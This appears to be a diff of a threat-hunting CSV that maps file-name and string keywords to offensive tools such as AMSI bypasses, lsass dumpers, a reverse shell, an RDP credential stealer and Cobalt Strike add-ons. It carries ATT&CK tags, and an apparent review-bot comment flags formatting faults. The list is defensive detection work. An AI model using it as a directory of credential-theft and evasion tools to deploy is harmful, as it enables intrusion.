Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
@@ -7184,10 +7328,10 @@
 "*AMS1-Patch.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
 "*AMSI patched in all powershells*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z"
 "*AMSI_Bypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
-"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z"
+"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z"
 "*AMSI_patch-main*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
-"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1325","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z"
-"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z"
+"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1326","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z"
+"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
 "*AmsiBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
 "*Amsi-Killer.exe*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z"
 "*Amsi-Killer.sln*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z"
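Review bot: The re-emitted `*amsi-bypass*` row for sliver writes its sub-techniques with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1569-002`), while the rows around it use the dotted ATT&CK form (`T1562.001`, `T1055.001`), so any consumer that joins `metadata_tool_techniques` against ATT&CK IDs will not resolve them; the field should read `T1573.001 - T1573.002 - …`. The `*AMSI_bypass_20*.ps1` row has a related defect, `T1548 T1562 T1027 ` separated by spaces with a trailing space instead of ` - `, and the `*anonsurf.py*` row in the next hunk uses the same space-separated form. The `*Amsi-Bypass*` row still carries `Github Username` in `metadata_tool`, which looks like a placeholder rather than a tool name. That keyword also differs from the sliver keyword only by case, so if matching is case-insensitive a single hit is attributed to two unrelated tools.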
@@ -7196,28 +7340,28 @@
 "*AmsiOpenSession.cpp*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
 "*AmsiOpenSession.sln*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
 "*AmsiOpenSession.vcxproj*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z"
-"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
-"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*AndrewSpecial.cpp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
 "*AndrewSpecial.exe*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
 "*AndrewSpecial-master*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
-"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*AnErrupTion/LoGiC.NET*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z"
 "*Anevicon*","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*ANGRYPUPPY2.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
-"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
-"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
+"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*anthemtotheego/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z"
-"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
-"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*antiword FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z"
-"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
+"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
 "*antonioCoco/JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
-"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z"
+"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z"
 "*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
-"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
+"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
 "*anypotato.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
 "*AoratosWin*.zip*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z"
 "*AoratosWin.csproj*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z"
@@ -7226,64 +7370,65 @@ "*AoratosWin.git*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.sln*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin_*.zip*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" -"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*APC_Ijnect_Load.nim*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*apex2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*apex2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*APIHookInjectorBin.exe*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.log*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.pdb*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.sln*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - 
T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*apokryptein/secinject*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" -"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
